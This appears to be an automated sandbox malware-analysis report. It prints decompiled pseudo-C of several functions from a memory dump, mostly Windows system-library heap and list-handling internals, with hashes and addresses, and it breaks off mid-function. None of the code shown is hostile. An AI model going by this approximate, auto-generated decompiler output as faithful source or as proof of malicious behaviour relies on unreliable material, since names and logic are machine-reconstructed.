0x04aefdad
0x04aefdb0
0x04aefdb8
0x04aefe0f
0x04aefde6
0x04aefde9
0x04aefdec
0x04b2c0c0
0x04aefdfe
0x04aefe06
0x04aefe06
0x04b2c0c8
0x04aefe2d
0x04aefe2d
0x00000000
0x04aefe2d
0x04b2c0d1
0x04b2c0e0
0x04b2c0e5
0x04b2c0e5
0x04b2c0e8
0x00000000
0x04b2c0e8
0x04aefdf4
0x00000000
0x00000000
0x04aefdf6
0x04aefdfa
0x04aefe1a
0x04aefe1f
0x04aefe1f
0x04aefdfc
0x00000000
0x04aefdfc
0x04aefdcc
0x04aefdd0
0x04aefe26
0x00000000
0x04aefe26
0x04aefdd8
0x04aefddb
0x04aefddd
0x04aefde0
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: 0ac43760acf47173f4601811674240d07a737ec11689898f26d067b62a20339c
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: 7F215972600640EFD7358F0AC680A66BBF5EB94B14F24856EE95987610E730FC00DB80

Uniqueness

Uniqueness Score: -1.00%

Function 04AB9240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E04AB9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x4b8f708);
				E04B0D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E04AF95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E04AF95D0();
				_t33 =  *0x4ba84c4; // 0x0
				L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x4ba84c4; // 0x0
				L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x4ba84c4; // 0x0
				E04AD2280(L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x4ba86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E04AF95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E04AF95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E04AB9325();
					_t50 =  *0x4ba84c4; // 0x0
					return E04B0D0D1(L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x04ab9240
0x04ab9242
0x04ab9247
0x04ab924c
0x04ab924e
0x04ab9255
0x04ab9257
0x04ab925a
0x04ab925f
0x04ab925f
0x04ab9266
0x04ab9271
0x04ab9276
0x04ab9279
0x04ab927e
0x04ab9295
0x04ab929a
0x04ab92b1
0x04ab92b6
0x04ab92d7
0x04ab92dc
0x04ab92e0
0x04ab92e6
0x04ab92e8
0x04ab92ee
0x04ab9332
0x04ab9333
0x04ab9337
0x04ab9338
0x04ab933a
0x04ab933a
0x04ab933d
0x04ab9342
0x04ab9342
0x04ab9345
0x04ab9349
0x04ab934e
0x04ab9352
0x04ab9357
0x04ab92f4
0x04ab92f4
0x04ab92f6
0x04ab92f9
0x04ab9300
0x04ab9306
0x04ab9324
0x04ab9324

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aa45f1165771d0c2404effd1f677585d7191c529e0ef8e8da52a143ad37c0d9a
Instruction ID: 9ed17b4792a6319e4005f3752eb4626c057d1802cfec5c97183caf0d3f9fc8e6
Opcode Fuzzy Hash: aa45f1165771d0c2404effd1f677585d7191c529e0ef8e8da52a143ad37c0d9a
Instruction Fuzzy Hash: BC2136B1440600DFD725EF68CA00B9AB7BDFF08708F1449A9A14A87AB2CA34F951CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04AEB390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E04AEB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E04AD2280(_t12, 0x4ba8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E04AF00C2(0x4ba8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x04aeb395
0x04aeb3a2
0x04aeb3a5
0x04aeb3aa
0x04aeb3b2
0x04aeb3ba
0x04aeb3bd
0x04aeb3c0
0x04aeb3c4
0x04aeb3c9
0x04b2a3e9
0x04b2a3ed
0x04b2a3f0
0x04b2a3ff
0x04b2a403
0x04b2a409
0x00000000
0x00000000
0x04b2a40b
0x04b2a40b
0x04b2a40f
0x04b2a415
0x04b2a423
0x04b2a423
0x04b2a415
0x04aeb3d1
0x04aeb3e8
0x04aeb3e8
0x04aeb3d9

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a7ffc522e0b727097716cc30e3dae71159cee67cc6d2c537e77a35788041e47
Instruction ID: cb6699761a4d09ccf0af8a8c73194dc92f90b773dfbe1d700038889793cf8693
Opcode Fuzzy Hash: 7a7ffc522e0b727097716cc30e3dae71159cee67cc6d2c537e77a35788041e47
Instruction Fuzzy Hash: 0C116F377051105BDB18DE19CF4167B7266EFC9330B294169DD26D7B80D931FC12C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 04B44257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E04B44257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x4b908d0);
				E04B0D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E04B441E8(__ebx, __edi, __ecx, _t39);
				E04ACEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x4ba87e4;
					_t18 =  *0x4ba87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x4ba5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x4ba87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x4ba87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L04AB7055(_t31 + 0xfffffff8);
								_t24 =  *0x4ba87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x4ba87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x4ba5cd0;
				if( *0x4ba5cd0 <= 0) {
					L04AB7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x4ba87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x4ba87e8 = _t30;
						 *0x4ba87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E04B0D0D1(L04B44320());
			}

0x04b44257
0x04b44257
0x04b44257
0x04b44259
0x04b4425e
0x04b44263
0x04b44265
0x04b44273
0x04b44278
0x04b4427c
0x04b4427f
0x04b44281
0x04b44287
0x04b442d7
0x04b442d7
0x04b442da
0x04b4428d
0x04b4428d
0x04b4428f
0x04b44292
0x04b44297
0x04b4429c
0x04b442a0
0x04b442a6
0x04b442a8
0x04b442ae
0x04b442b3
0x00000000
0x04b442ba
0x04b442ba
0x04b442bf
0x04b442c5
0x04b442ca
0x04b442cf
0x04b442d0
0x00000000
0x04b442d0
0x04b442b3
0x00000000
0x04b442a6
0x04b4429c
0x04b442dc
0x04b442dc
0x04b442e3
0x04b44309
0x04b442e5
0x04b442e5
0x04b442e8
0x04b442ee
0x04b442f0
0x00000000
0x04b442f2
0x04b442f2
0x04b442f4
0x04b442f7
0x04b442f9
0x04b44300
0x04b44300
0x04b442f0
0x04b4430e
0x04b4431f

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 766cff80ae168b382d4df6566114d1bc3afee47011055605aaabe42cfb63e2a5
Instruction ID: 6a0f639ffba5e622b0501c47cf6bb16bf6659264e52d9ada0f7e786e49af0577
Opcode Fuzzy Hash: 766cff80ae168b382d4df6566114d1bc3afee47011055605aaabe42cfb63e2a5
Instruction Fuzzy Hash: 01218EB0A10601DFDB14EF65D1417147BF1FBC5318B1082EFC1098BA94E735E861DB51

Uniqueness

Uniqueness Score: -1.00%

Function 04B346A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E04B346A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L04AD4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E04AFF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E04AED268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L04AD77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x04b346b7
0x04b346ba
0x04b346c5
0x04b346c8
0x04b346d0
0x04b346d4
0x04b346e6
0x04b346e9
0x04b346f4
0x04b346ff
0x04b34705
0x04b34706
0x04b3470c
0x04b34713
0x04b3471b
0x04b34723
0x04b34725
0x04b346d6
0x04b346d9
0x04b346db
0x04b346db
0x04b34732

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: adb21d8ffa92d5aeeb4488bf5c4490619070dad91f326a88e2a2df8d61f3225e
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 48112572504208BFD7059F5DD9808BEF7B9EF95304F1080AAF945CB350DA319D55D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 04AE2397, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E04AE2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x4ba848c != 0) {
					L04ADFAD0(0x4ba8610);
					if( *0x4ba848c == 0) {
						E04ADFA00(0x4ba8610, _t19, _t27, 0x4ba8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E04AE2581(0x4ba8610, 0x4a950a0, _t26, _t27, _t28);
						E04ADFA00(0x4ba8610, 0x4a950a0, _t27, 0x4ba8610);
					}
				} else {
					L1:
					_t11 =  *0x4ba8614; // 0x1
					if(_t11 == 0) {
						_t11 = E04AF4886(0x4a91088, 1, 0x4ba8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E04AE2581(0x4ba8610, (_t11 << 4) + 0x4a95070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x04ae23b0
0x04ae23b6
0x04ae2409
0x04ae2415
0x04b25ae9
0x00000000
0x04ae241b
0x04ae241b
0x04ae241d
0x04ae2427
0x04ae242e
0x04ae2430
0x04ae2430
0x04ae23b8
0x04ae23b8
0x04ae23b8
0x04ae23bf
0x04ae23fc
0x04ae23fc
0x04ae23c1
0x04ae23c3
0x04ae23d0
0x04ae23d8
0x04ae23d8
0x04ae23dc
0x04ae23de
0x04ae23e1
0x04ae23e1
0x04ae23ec

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e44009dcb6454130a171b1b8c6b50a8610784eb75c75272be0223c0570c100c8
Instruction ID: d2584947a6b9bcad0ce08bf83082e73d6f95af7d29f60b75ce8c128ad31bc224
Opcode Fuzzy Hash: e44009dcb6454130a171b1b8c6b50a8610784eb75c75272be0223c0570c100c8
Instruction Fuzzy Hash: 0F114833B043117BF721AA2AED41B26B2DCEB50714F0844A6F603A7650D974FC018A65

Uniqueness

Uniqueness Score: -1.00%

Function 04ABC962, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E04ABC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x4bad360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E04ACEEF0(0x4ba70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E04B3F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E04ACEB70(_t29, 0x4ba70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E04AFB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E04B3F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x4ba70c0; // 0x0
					while(_t38 != 0x4ba70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x4bab1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x04abc96a
0x04abc974
0x04abc988
0x04abc98a
0x04b27c9d
0x04b27c9f
0x04b27ca4
0x04b27cae
0x04b27cf0
0x04b27cf5
0x04b27cfa
0x04abc992
0x04abc996
0x04abc997
0x04abc998
0x04abc9a3
0x04abc9a3
0x04b27cb0
0x04b27cb7
0x04b27cbb
0x00000000
0x00000000
0x04b27cbd
0x04b27ce8
0x04b27cc5
0x04b27cc8
0x04b27cca
0x04b27cd0
0x04b27cd6
0x04b27cde
0x04b27ce4
0x04b27ce4
0x04b27cd0
0x00000000
0x04b27ce8
0x04abc990
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ab261b5738a7b6dc15f32dd76c636d4df3d27bcf2eb3968403c3b50ee9df55b
Instruction ID: 9d52ed6c4e2d61fb000e5a36381e2b381ac4e3f3e8a5837f1970c19ff9a59fbf
Opcode Fuzzy Hash: 1ab261b5738a7b6dc15f32dd76c636d4df3d27bcf2eb3968403c3b50ee9df55b
Instruction Fuzzy Hash: 6411A5317086169FD760AF79DD4696B77E5FB84614F00056AF94583650EF24FC20C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 04AF37F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E04AF37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E04AD2280(_t6, 0x4ba8550);
				}
				_t29 = E04AF387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E04ACFFB0(0x4ba8550, _t27, 0x4ba8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x04af37fa
0x04af37fc
0x04af3805
0x04af3808
0x04af3808
0x04af3814
0x04af3818
0x04af3846
0x04af3848
0x04af384b
0x04af384b
0x04af3852
0x00000000
0x04af3854
0x04af3856
0x00000000
0x00000000
0x04af3863
0x00000000
0x04af3863
0x04af381a
0x04af381a
0x04af381f
0x04af386e
0x04af386e
0x04af3871
0x04af3873
0x04af3873
0x04af3868
0x00000000
0x04af3868
0x04af3821
0x04af3826
0x00000000
0x00000000
0x04af3828
0x04af382a
0x04af3841
0x00000000
0x04af3841

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 904bc6534106580cb757517b63d218ade2cebfc7d1f7175f213cac5a689a60ca
Instruction ID: b7e3a033e91b345a0b47e0bec59362187a07ac33e789e8fd8e0335b31d9a7c09
Opcode Fuzzy Hash: 904bc6534106580cb757517b63d218ade2cebfc7d1f7175f213cac5a689a60ca
Instruction Fuzzy Hash: 2B01C8B2A055105BD7378F9A9E40A26BBA6DF85B50B554069FE458B310D738EC01C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 04AE002D, Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04AE002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E04AD7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E04AD7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E04AD7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E04AD7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x04ae0032
0x04ae0037
0x04ae0043
0x04b24b3a
0x04ae0049
0x04ae0049
0x04ae0049
0x04ae004e
0x04ae0053
0x04b24b48
0x04b24b5a
0x04b24b4a
0x04b24b53
0x04b24b53
0x04b24b5f
0x00000000
0x04b24b61
0x00000000
0x04b24b61
0x04ae0059
0x04ae0059
0x04ae0060
0x04b24b6f
0x04b24b6f
0x04ae0069
0x04b24b83
0x00000000
0x00000000
0x04b24b90
0x04b24b9b
0x04b24b9b
0x04b24ba4
0x00000000
0x00000000
0x04b24baa
0x00000000
0x04ae006f
0x04ae006f
0x00000000
0x04ae006f
0x04ae0069

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 698acf9b56e9415a24e29ba9258cdc34d012111f753463650e0f15a82394f354
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: 4911C8327056A18FE7229B25CF58B3577E4EF41758F0900E1DD1997E92E768F841C650

Uniqueness

Uniqueness Score: -1.00%

Function 04AC766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E04AC766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E04AEF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E04AEF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L04AD4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x04ac7672
0x04ac767f
0x04ac7689
0x04ac76de
0x04ac76de
0x04ac768b
0x04ac7691
0x04ac7693
0x04ac7697
0x00000000
0x04ac7699
0x04ac76a8
0x00000000
0x04ac76aa
0x04ac76ad
0x04ac76b1
0x00000000
0x04ac76b3
0x04ac76b3
0x04ac76b5
0x04ac76ba
0x04ac76bc
0x04ac76bc
0x04ac76c0
0x00000000
0x04ac76c2
0x04ac76ce
0x04ac76ce
0x04ac76c0
0x04ac76b1
0x04ac76a8
0x04ac7697
0x04ac76d9

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: afdff58911f68d1a0eeb76998b4b64476120b130b6e7e2115be479bd8412cd64
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 9001843270111AAFD760EE5ECD41EAB77ADEB94760B240528B919CF250DA30ED018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04AB9080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E04AB9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x4ba85ec;
				E04AD2280(_t48, 0x4ba85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E04ACFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x4ba538c; // 0x96cd18
					if( *_t84 != 0x4ba5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
